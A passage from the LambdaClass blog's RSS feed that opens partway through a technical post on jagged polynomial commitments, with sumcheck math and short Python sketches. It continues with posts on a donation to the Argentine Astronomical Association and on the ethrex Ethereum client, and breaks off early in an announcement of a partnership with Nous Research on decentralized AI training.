Using the sumcheck protocol for products of multilinears, the claim reduces to the verifier checking that $v = q(\alpha) f_t (\alpha)$ at a random point $\alpha$, which in turn amounts to checking $q(\alpha) = \beta_1$ and $f_t (\alpha) = \beta_2$. The key point is that $f_t$ can be evaluated efficiently by the verifier, as proven in Claim 3.2.1.&lt;&#x2F;p&gt;
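&lt;p&gt;As a minimal sketch of the indexing behind $f_t$ (the column heights and their prefix sums are toy values): on boolean inputs, $\mathrm{eq}$ reduces to an equality indicator, so $f_t$ simply checks that the flat index $i$ lands in row $z_r$ of column $z_c$.&lt;&#x2F;p&gt;

```python
# Sketch: the jagged index maps row(i), col(i) behind f_t, assuming columns
# are concatenated in order and t is the prefix-sum list of column heights
# with t[0] = 0. On boolean inputs, eq(a, b) is 1 iff a == b, so
# f_t(z_r, z_c, i) = eq(row(i), z_r) * eq(col(i), z_c) is the 0/1 indicator
# that flat index i lands in row z_r of column z_c.

heights = [3, 1, 4]                   # toy column heights
t = [0]
for h in heights:
    t.append(t[-1] + h)               # t = [0, 3, 4, 8]

def col(i):
    # the unique y with i in [t_y, t_{y+1})   (written without comparisons on '.lt.')
    for y in range(len(heights)):
        if i >= t[y] and t[y + 1] > i:
            return y

def row(i):
    return i - t[col(i)]

def f_t(z_r, z_c, i):
    return 1 if (row(i) == z_r and col(i) == z_c) else 0

# flat index 5 sits in column 2 (heights 3 + 1 already consumed), row 1
assert (row(5), col(5)) == (1, 2)
assert f_t(1, 2, 5) == 1
assert f_t(0, 2, 5) == 0
```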
&lt;p&gt;To show that the function can be computed efficiently, the paper introduces a function $g(w,x,y,z)$ satisfying $g(w,x,y,z) = 1$ if and only if $x &amp;lt; z$ and $x = w + y$. This function can be directly related to $f_t$, and $g$ can be computed efficiently using a width-4 branching program:&lt;br &#x2F;&gt;
$f_t (z_r , z_c , i) = \sum_y \mathrm{eq} (z_c , y) g(z_r , i , t_{y - 1} , t_y )$&lt;&#x2F;p&gt;
&lt;p&gt;The proof relies on the uniqueness of the multilinear extension, so it suffices to check the equality for $z_r , z_c , i$ as binary strings. If $g(z_r , i , t_{ y - 1} , t_y ) = 1$, then $i &amp;lt; t_y$ and $i = z_r + t_{ y - 1}$. Since $z_r \geq 0$, it follows that $t_{y - 1} \leq i &amp;lt; t_y$ and $z_r = i - t_{y - 1}$. This says precisely that $\mathrm{col}_t (i) = z_c$ and $\mathrm{row}_t (i) = z_r$, so $f_t (z_r , z_c , i) = 1$. Conversely, if $f_t (z_r , z_c , i) = 1$, then the variables $w, x, y , z$ automatically satisfy the conditions for $g(w,x,y,z) = 1$.&lt;&#x2F;p&gt;
&lt;p&gt;From the above, we see that we can compute $f_t$ by calculating $2^k$ evaluations of $g$. By Claim 3.2.2, a width-4 read-once branching program can compute $g$ efficiently, inspecting each bit of $w, x, y, z$ in a streaming fashion. The conditions $i &amp;lt; t_y$ and $z_r = i - t_{ y - 1}$ for non-vanishing $g$ can be checked by looking at 4 bits at a time and keeping track of two additional variables.&lt;&#x2F;p&gt;
&lt;p&gt;The paper then discusses how to produce symbolic evaluations using a read-once matrix branching program, which we will need for batch-proving multiple evaluations. The program is defined by a sequence of matrices $M = \{ M_j^\sigma \}$, where $\sigma \in \{ 0,1 \}^b$ and $j = 1, 2, … , n$, and a sink vector $u$. Given an input $x \in \{ 0 , 1 \}^n$, the output of the program is the first component of the vector $(\prod M_j^{ x_j }) u$, that is, $e_1^t (\prod M_j^{ x_j }) u$, where $e_{1j} = \delta_{1j}$ (one if and only if $j = 1$, zero otherwise).&lt;&#x2F;p&gt;
&lt;p&gt;If the matrices are boolean (having as entries either $0$ or $1$), matrix multiplication involves only additions (the paper calls matrices multiplication-friendly if computing their product involves a linear number of additions and no multiplications).&lt;&#x2F;p&gt;
&lt;p&gt;When the sink vector $u$ is not given, the evaluation can be carried out in symbolic form; once the vector is finally provided, the final value of the matrix branching program is obtained. The idea is that we can compute a vector $\mathrm{res}$ such that $\mathrm{res} \cdot u = f_{M,u} (z)$, where $f_{M,u}$ is the multilinear extension of the matrix branching program given by $M$ and $u$. The vector $\mathrm{res}$ is given by&lt;br &#x2F;&gt;
$$\mathrm{res} = e_1^t \prod_j \left( \sum_\sigma \mathrm{eq} (z_j , \sigma) M_j^\sigma \right)$$&lt;&#x2F;p&gt;
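&lt;p&gt;The formula above can be sketched in a few lines of Python (toy $2 \times 2$ matrices over the integers, single-bit alphabet; all names and values are illustrative):&lt;&#x2F;p&gt;

```python
# Sketch: symbolic evaluation of a read-once matrix branching program,
# leaving the sink vector u free. We fold in one blended matrix per input
# coordinate, computing res = e_1^t * prod_j ( sum_sigma eq(z_j, sigma) M_j^sigma ),
# so that res . u recovers the program's multilinear extension at z.

def eq1(z, s):
    # multilinear eq on a single bit
    return z * s + (1 - z) * (1 - s)

def symbolic_eval(matrices, z):
    # matrices[j] = (M_j^0, M_j^1); z is a tuple of field elements
    dim = len(matrices[0][0])
    res = [1] + [0] * (dim - 1)       # start from e_1^t as a row vector
    for (M0, M1), zj in zip(matrices, z):
        blend = [[eq1(zj, 0) * M0[r][c] + eq1(zj, 1) * M1[r][c]
                  for c in range(dim)] for r in range(dim)]
        res = [sum(res[r] * blend[r][c] for r in range(dim))
               for c in range(dim)]
    return res

def finish(res, u):
    # plug in the sink vector once it becomes available
    return sum(a * b for a, b in zip(res, u))

I = [[1, 0], [0, 1]]                  # identity
S = [[0, 1], [1, 0]]                  # swap
program = [(I, S), (I, S)]            # reading bit j selects I or S
u = [1, 0]

# on boolean inputs, the symbolic result matches direct evaluation
assert finish(symbolic_eval(program, (1, 1)), u) == 1   # S * S = I
assert finish(symbolic_eval(program, (1, 0)), u) == 0   # S * I = S
```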
&lt;h2 id=&quot;batch-proving-of-multiple-evaluations&quot;&gt;Batch-proving of multiple evaluations&lt;&#x2F;h2&gt;
&lt;p&gt;The problem we face is that the verifier should compute $k$ evaluations, which can be prohibitively costly. However, by interacting with the prover, we can boil everything down to just one evaluation. This follows a standard technique, where the verifier selects random weights $\alpha_0, \alpha_1, … , \alpha_{ k - 1}$ and the prover performs a random linear combination. More precisely, suppose that we want to prove that&lt;br &#x2F;&gt;
$h (z_0 ) = v_0$&lt;br &#x2F;&gt;
$h (z_1 ) = v_1$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$h (z_{ k - 1} ) = v_{ k - 1}$&lt;br &#x2F;&gt;
The prover then does the following linear combination with $\alpha_j$,&lt;br &#x2F;&gt;
$\sum_j \alpha_j h( z_j ) = \sum_j \alpha_j v_j$&lt;br &#x2F;&gt;
The prover wants to convince the verifier that $h( z_j ) = v_j$ holds for every $j$, so the values $v_j$ are sent to the verifier. The verifier can then compute the right-hand side, $\sum \alpha_j v_j$, on its own.&lt;&#x2F;p&gt;
&lt;p&gt;The left-hand side can be calculated efficiently by the prover. First, note that&lt;br &#x2F;&gt;
$h( z_j ) = \sum_b h (b) \mathrm{eq} (b , z_j) = \sum_m h_m \mathrm{eq} (b , z_j)$&lt;br &#x2F;&gt;
where $m = \sum_i b_i 2^i$ with $b = b_0 b_1 b_2 … b_{n - 1}$. In other words, the evaluation $h (z_j)$ can be computed as the inner product between the vector $h$, with components $h_m = h(b)$, and the vector of Lagrange basis polynomials $\mathrm{eq}(b , z_j)$. Since the inner product is (bi)linear, we can write the linear combination as&lt;br &#x2F;&gt;
$\sum \alpha_j h( z_j ) = \sum h(b) \left(\sum \alpha_j \mathrm{eq} (b , z_j) \right)$&lt;br &#x2F;&gt;
The prover and verifier can run the sumcheck protocol on $\left(h(b) \sum \alpha_j \mathrm{eq} (b , z_j) \right)$ and at the end the verifier has to compute $h(\rho ) \sum \alpha_j \mathrm{eq} (\rho , z_j)$ at the random point $\rho$, which in practice would be an oracle query for $h$ plus computing the linear combination $\sum \alpha_j \mathrm{eq} (\rho , z_j)$. Some optimizations used in the sumcheck protocol are presented in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2024&#x2F;108.pdf&quot;&gt;improvements on zerocheck&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
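&lt;p&gt;The batching identity that makes this work can be checked directly on a toy example (integers instead of a finite field; all values are illustrative):&lt;&#x2F;p&gt;

```python
# Sketch: for a multilinear h, sum_j alpha_j * h(z_j) equals the sum over
# boolean b of h(b) * ( sum_j alpha_j * eq(b, z_j) ), by (bi)linearity of
# the inner product. Toy version with 2 variables over the integers.

from itertools import product

def eq(b, z):
    out = 1
    for bi, zi in zip(b, z):
        out *= bi * zi + (1 - bi) * (1 - zi)
    return out

def mle(values, z):
    # multilinear extension of values indexed by boolean points
    return sum(v * eq(b, z)
               for b, v in zip(product([0, 1], repeat=2), values))

values = [7, 3, 5, 11]                # h on the points 00, 01, 10, 11
zs = [(2, 3), (5, 1), (4, 4)]         # evaluation points z_j
alphas = [9, 2, 6]                    # random weights from the verifier

lhs = sum(a * mle(values, z) for a, z in zip(alphas, zs))
rhs = sum(v * sum(a * eq(b, z) for a, z in zip(alphas, zs))
          for b, v in zip(product([0, 1], repeat=2), values))
assert lhs == rhs                     # the batched sumcheck target
```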
&lt;h2 id=&quot;where-does-all-this-fit-in-and-future-work&quot;&gt;Where does all this fit in and future work&lt;&#x2F;h2&gt;
&lt;p&gt;The jagged approach allows us to commit to the non-zero part of tables and save a lot of work, both in terms of memory requirements and commitment times. If we combine this idea with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.binius.xyz&#x2F;basics&#x2F;arithmetization&#x2F;m3&quot;&gt;M3 arithmetization&lt;&#x2F;a&gt;, where we do not need to commit to polynomials that can be computed via certain operations from trace polynomials (virtual polynomials), we see a massive reduction in the amount of work we have to do. This, in turn, could drive proving time, proving cost, and memory footprint down, allowing us to prove bigger Ethereum and L2 blocks, effectively scaling Ethereum to bring in more users and power more use cases.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Supporting Science: LambdaClass Donates to the Argentine Astronomical Association</title>
          <pubDate>Thu, 29 May 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/supporting-science-lambdaclass-donates-to-the-argentine-astronomical-association/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/supporting-science-lambdaclass-donates-to-the-argentine-astronomical-association/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/supporting-science-lambdaclass-donates-to-the-argentine-astronomical-association/">&lt;p&gt;At LambdaClass we believe that advancing science requires collaboration across disciplines and sectors. As part of our commitment to supporting scientific research and education, we recently made a donation to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.astronomiaargentina.org.ar&#x2F;&quot;&gt;&lt;em&gt;Asociación Argentina de Astronomía&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; (Argentine Astronomical Association), a non-profit organization dedicated to promoting astronomical research and knowledge in Argentina since 1958.&lt;&#x2F;p&gt;
&lt;p&gt;We were honored to receive the following letter of appreciation from the Association:&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;Dear Federico Carrone,&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We would like to express our deepest gratitude, and ask that you extend it to LambdaClass, for the generous annual donation of USD 10,000 to the Argentine Astronomical Association (AAA). This contribution will cover the two most significant annual expenses of our organization, which in some years account for up to 80% of our total budget:&lt;&#x2F;p&gt;
&lt;p&gt;a) The payment of the national membership fee to the International Astronomical Union (IAU) for Argentine astronomers and physicists;&lt;&#x2F;p&gt;
&lt;p&gt;b) The annual contribution as a sponsoring country of the journal &lt;em&gt;Astronomy &amp;amp; Astrophysics&lt;&#x2F;em&gt; (A&amp;amp;A).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;why-does-iau-membership-justify-this-investment&quot;&gt;&lt;strong&gt;Why does IAU membership justify this investment?&lt;&#x2F;strong&gt;&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Access to travel grants for General Assemblies, Regional Meetings, and Symposia.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Active participation in the scientific structure of the IAU, with opportunities to hold leadership positions on the Executive Committee and to join Divisions, Commissions, and Working Groups, as well as to propose symposia.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Eligibility for IAU awards, which recognize scientific excellence and community engagement.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Access to development and outreach grants that support socially impactful projects and specialized training events.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Participation in global scientific resolutions and decision-making processes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. Regular newsletters from Divisions and Commissions, becoming an active member of the largest international community of professional astronomers.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. Promotion of astronomy in STEM education at all levels through the IAU Office of Astronomy for Education (IAU-OAE).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;argentina-as-a-sponsoring-country-of-astronomy-astrophysics-a-a&quot;&gt;&lt;strong&gt;Argentina as a sponsoring country of &lt;em&gt;Astronomy &amp;amp; Astrophysics&lt;&#x2F;em&gt; (A&amp;amp;A):&lt;&#x2F;strong&gt;&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;A&amp;amp;A&lt;&#x2F;em&gt; is consistently ranked among the most prestigious journals in the field of astronomy and astrophysics worldwide. Publishing in it is considered a significant scientific achievement.&lt;&#x2F;p&gt;
&lt;p&gt;Its open-access model ensures that all articles are freely and immediately available globally, increasing both their visibility and citation potential.&lt;&#x2F;p&gt;
&lt;p&gt;Thanks to Argentina’s sponsorship, our astronomy community can publish in &lt;em&gt;A&amp;amp;A&lt;&#x2F;em&gt; without additional costs or delays. Without this benefit, individual researchers would face fees of up to USD 2,000 per article.&lt;&#x2F;p&gt;
&lt;p&gt;Through its annual contribution, LambdaClass will enable (primarily but not exclusively) the astronomers and physicists of the Argentine astronomical community to publish their articles at no additional cost in one of the most prestigious international journals of Astronomy and Astrophysics, while maintaining our contribution to the international scientific community.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;We believe in long-term investment in knowledge and curiosity-driven research. Like computer science, astronomy is built on rigorous thinking, open collaboration, and the pursuit of deeper understanding.&lt;&#x2F;p&gt;
&lt;p&gt;This donation is more than a gesture; it’s a recognition of the vital role that institutions such as the Asociación Argentina de Astronomía play in advancing science and education in our country, and a tribute to the people who make that work possible.&lt;&#x2F;p&gt;
&lt;p&gt;Civil and public institutions are only as strong as the societies that support and value them. By strengthening these institutions, we strengthen our collective future.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Celebrating a year of ethrex</title>
          <pubDate>Fri, 16 May 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/celebrating-a-year-of-ethrex/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/celebrating-a-year-of-ethrex/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/celebrating-a-year-of-ethrex/">&lt;p&gt;We have been working at LambdaClass on an Ethereum L1 Execution and L2 client called ethrex since June 2024. Now that it’s maturing and&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ethereum&#x2F;hive&#x2F;pull&#x2F;1286&quot;&gt; &lt;em&gt;recently added to Hive&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;, we think it’s time to talk about it a bit and highlight what sets it apart from others.&lt;&#x2F;p&gt;
&lt;p&gt;Ethrex began as an exploratory project with just three team members and has since grown into a 40-person initiative—now one of LambdaClass’ top priorities. It is the first stack to natively incorporate based rollups since day one. We’re preparing to enter the security audit phase and will move directly into production with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;fede_intern&#x2F;status&#x2F;1846035499799978475&quot;&gt;&lt;em&gt;Rogue&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;, alongside several institutions and clients eager to deploy their own L2 stacks.&lt;&#x2F;p&gt;
&lt;p&gt;Most of the ideas that motivate ethrex share a core tenet: simplicity. We recommend reading Vitalik’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;vitalik.eth.limo&#x2F;general&#x2F;2025&#x2F;05&#x2F;03&#x2F;simplel1.html&quot;&gt;&lt;em&gt;recent post&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; about simplifying the L1; it shares many of the same ideas we will talk about in this post and greatly resonates with us as a guiding principle.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;why-build-yet-another-ethereum-execution-client&quot;&gt;&lt;strong&gt;Why build yet another Ethereum execution client?&lt;&#x2F;strong&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;At this point, the Ethereum ecosystem has good client diversity: Geth, Besu, Erigon, Nethermind and Reth are all production-grade choices, though with varying degrees of popularity. So why write a new client, and why do it in Rust when Reth exists?&lt;&#x2F;p&gt;
&lt;p&gt;The more we got involved in the crypto space and used its tools and codebases, the more we realized that most of them had more complexity than we were comfortable with; sometimes even actively seeking it as part of their development process. Libraries with dozens of modules to modularize even the slightest things, APIs with tons of traits and generics looking to abstract every contingency, macros used to (debatably) save lines of code at the cost of readability, these are all inconveniences we and others have to constantly deal with when integrating with crypto repositories.&lt;&#x2F;p&gt;
&lt;p&gt;Ethrex is our attempt at solving this. It aims to be the infrastructure, libraries and tooling we wish we had when we started. In line with the&lt;a href=&quot;&#x2F;lambdas-engineering-philosophy&#x2F;&quot;&gt; &lt;em&gt;LambdaClass work ethos&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;, our goal is to always keep things simple and minimal. This is reflected in a few different ways.&lt;&#x2F;p&gt;
&lt;p&gt;We track lines of code for the project, ensuring we never go over a limit. The entire repo currently sits at 62k lines. This includes code for our EVM implementation, our L2 stack (along with ZK provers and TEE code), and our Ethereum SDK. Most other clients average around 200k lines in their main repos, not counting their dependencies, which are usually split into other repos (EVM, SDK, provers); including those can easily tip it over 300k or more. Our approach leans heavily into vertical integration and minimalism, ensuring we have control over the whole stack while keeping it as simple as possible.&lt;&#x2F;p&gt;
&lt;p&gt;We have daily automated Slack messages to stay vigilant about lines of code in our project, and we regularly look for dead or unnecessary code and refactoring opportunities to trim them down.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;https:&#x2F;&#x2F;lh7-rt.googleusercontent.com&#x2F;docsz&#x2F;AD_4nXdcALtGQVAcNJIEOOLkG6-jxrPB_TceM-wGY_XHqMNqk7mA0-e5ybIXqr0avzaihCNCcjfkKC-Kyved58JHcVGJ0fBgBMs1JBAOpfhUwm-v9V3DTQ0JwQZHRpbayXHK3aF-YodyWQ?key=QZhQagxqvNX4hb2HYsJWkA&quot; alt=&quot;&quot; &#x2F;&gt;Lines of code report&lt;&#x2F;p&gt;
&lt;p&gt;As the image above shows, the ethrex repo consists only of six self-explanatory main crates:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * blockchain&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * common&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * l2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * networking (divided into p2p and rpc)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * storage&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * vm&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This is very much on purpose; other clients tend to modularize code too much into different packages, hurting readability and simplicity.&lt;&#x2F;p&gt;
&lt;p&gt;Use of traits is kept to a minimum, introduced only when it absolutely makes sense. Our codebase contains as few as 12 traits, which we already consider too many and are actively looking to reduce. They are used for the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * RLP encoding and decoding.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Signing of data.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Trie Storage, Regular Storage, and L2 Storage.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * RLPx encoding and RPC handlers.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * EVM hooks.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Use of macros is frowned upon throughout the codebase. There are only four of them in ethrex, three used only for tests and one for Prometheus metrics collection.&lt;&#x2F;p&gt;
&lt;p&gt;Dependencies are also kept in check as much as possible. Rust codebases are notorious for piling up crates, and while we still consider we depend on too many of them, we make periodic efforts to reduce them.&lt;&#x2F;p&gt;
&lt;p&gt;Minimalism is also reflected in our decision not to implement historical features; ethrex only supports post merge forks. We believe Ethereum should have a forward-looking accelerationist attitude to win over its competitors in the blockchain landscape, which means moving fast, embracing change, and remaining lean by not being afraid of quickly dropping support for old features. This also improves ROI on the project because it allows us to both develop and maintain it with a smaller team.&lt;&#x2F;p&gt;
&lt;p&gt;We are very opinionated about how to write Rust code. While we love the language for its mix of high performance, memory safety guarantees and high level language constructs, we believe it is easy to get carried away with its features and overcomplicate codebases; having a rich and expressive type system does not mean one should take every opportunity to reify every problem into it through a trait. This obfuscates code for newcomers and makes it more complex at very little benefit.&lt;&#x2F;p&gt;
&lt;p&gt;For developers, all this has an impact not only on readability and ease of use, but also on compilation times. Complex code architectures with many traits and macros add to compile times, which hurts developer experience. It is not uncommon to see Rust projects take multiple minutes to compile on modern machines, and code complexity plays a big part in that.&lt;&#x2F;p&gt;
&lt;p&gt;However, simplicity and minimalism are not just about making the developer experience easier. The fewer the lines of code, the easier it is to maintain the code, find bugs or vulnerabilities, and spot possible performance bottlenecks and improvements. It also reduces the attack surface for security vulnerabilities in the first place.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;ethrex-l2&quot;&gt;&lt;strong&gt;Ethrex L2&lt;&#x2F;strong&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;From the beginning, ethrex was conceived not just as an Ethereum L1 client, but also as an L2 (ZK Rollup) client. This means anyone can use ethrex to deploy an EVM equivalent, multi-prover (supporting SP1, RISC Zero and TEEs) based rollup with just one command. Financial institutions can also use it to deploy their own L2, with the choice of deploying it as a Validium, a based Rollup or a regular ZK Rollup. In fact, our upcoming permissionless based L2&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;fede_intern&#x2F;status&#x2F;1846035499799978475&quot;&gt; &lt;em&gt;Rogue&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; uses ethrex and anyone will be able to join it by just cloning the repo and running a command.&lt;&#x2F;p&gt;
&lt;p&gt;Key to the development of ethrex L2 is the availability of general purpose ZK virtual machines using hash-based proving systems, such as SP1 and RISC Zero, that allow proving arbitrary code written in Rust.&lt;&#x2F;p&gt;
&lt;p&gt;Being in the crypto space for some years now, we have experienced firsthand the pains of writing arithmetic circuits using libraries like Circom, Bellman, Arkworks or Gnark. Doing so requires in-depth knowledge about the internals of zk-SNARKS, which most engineers do not and should not care about. Additionally, requiring a different API or DSL to write circuits means you end up with two implementations of the same thing: one out of circuit and one in-circuit. This is a huge source of problems, because on every code change there’s the possibility of a divergence between the code being executed and the code being proven, and solving those types of bugs can be challenging and time consuming.&lt;&#x2F;p&gt;
&lt;p&gt;With a RISC-V zkVM, those problems go away; engineers can easily write the code to be proven without having to understand any of the internals, and the chances of a divergence are minimal, because almost all code can be shared between the “out of circuit” and the “in circuit” versions.&lt;&#x2F;p&gt;
&lt;p&gt;ZK-rollups like Scroll and ZKsync tightly coupled their proving system with their VM. While this worked, it meant having a non-EVM architecture and going through a lot of hoops to support EVM equivalence. It also meant having an in-house team of expert cryptographers to design and develop all the complex circuits required to prove their execution. At LambdaClass, we believe that the low level cryptography should be left to projects like Starkware’s Stwo, Lita’s Valida, Polygon’s PetraVM, Succinct’s SP1, or a16z’s Jolt. Our job is to then plug their work into ours, decoupling the cryptography from the rest of the codebase, greatly simplifying the development. This is what allowed us to be the only client designed from the beginning to be an L1, an L2 and a based rollup.&lt;&#x2F;p&gt;
&lt;p&gt;All these benefits can be seen very clearly: the entire l2&#x2F;prover directory where all the related code lives has only 1.3k lines of code, and even that can be reduced further since we haven’t moved some behavior to common functions yet. In other projects we have used and worked with, the ZK-related code was massive, sometimes matching or surpassing the regular non-ZK one.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-s-left&quot;&gt;&lt;strong&gt;What’s left&lt;&#x2F;strong&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;We have made a lot of progress in the past year, from an empty repository to a full-fledged L1 and L2 client, but there is still work to be done to make ethrex production-ready. The main focus right now is on performance. We are currently sitting at around 0.3 gigagas&#x2F;s, and we aim to hit at least 1 gigagas&#x2F;s in the coming weeks, most of it coming from improvements to trie&#x2F;database accesses. Afterwards come security audits and based rollup support. We also have extra features planned on top, including alternative DA support for validiums and custom native token mode, both for ethrex L2.&lt;&#x2F;p&gt;
&lt;p&gt;This year’s Devconnect will take place in our hometown, Buenos Aires. By then, we aim to have a feature-complete version of ethrex running in production, ready to showcase some of its most exciting use cases. As mentioned, a growing number of companies and institutions have expressed interest in ethrex and its potential. Our mission is to help advance Ethereum’s development by building infrastructure and applications that address real-world challenges.&lt;&#x2F;p&gt;
&lt;p&gt;We invite you to follow along our progress as we build in the open and try it out yourself:&lt;&#x2F;p&gt;
&lt;p&gt;Telegram: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;t.me&#x2F;ethrex_client&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;t.me&#x2F;ethrex_client&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;br &#x2F;&gt;
Github: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;ethrex&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;ethrex&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Lambda&#x27;s new strategic partnership with Nous Research: decentralized artificial intelligence</title>
          <pubDate>Tue, 06 May 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-new-strategic-partnership-with-nous-research-decentralized-artificial-intelligence/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-new-strategic-partnership-with-nous-research-decentralized-artificial-intelligence/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-new-strategic-partnership-with-nous-research-decentralized-artificial-intelligence/">&lt;p&gt;We’re pleased to announce our partnership with &lt;strong&gt;Nous Research&lt;&#x2F;strong&gt; to help develop &lt;strong&gt;Psyche&lt;&#x2F;strong&gt;, a decentralized AI training network. The system is designed to allow anyone to contribute to model training using idle compute, making AI development more open, efficient, and verifiable.&lt;&#x2F;p&gt;
&lt;p&gt;This initiative addresses a long-standing problem in AI: the high barrier to entry caused by the cost of training. Psyche is built to enable experimentation, lower infrastructure requirements, and distribute control away from a small number of centralized actors.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-psyche&quot;&gt;What is Psyche?&lt;&#x2F;h2&gt;
&lt;p&gt;Psyche is a Rust-based decentralized training system that uses peer-to-peer networking to coordinate multiple training runs across devices. Instead of relying on centralized data centers, it allows individual users with idle machines—such as gaming PCs—to contribute compute to model training.&lt;&#x2F;p&gt;
&lt;p&gt;All coordination between nodes happens on the &lt;strong&gt;Solana blockchain&lt;&#x2F;strong&gt;, providing a fault-tolerant and censorship-resistant system.&lt;&#x2F;p&gt;
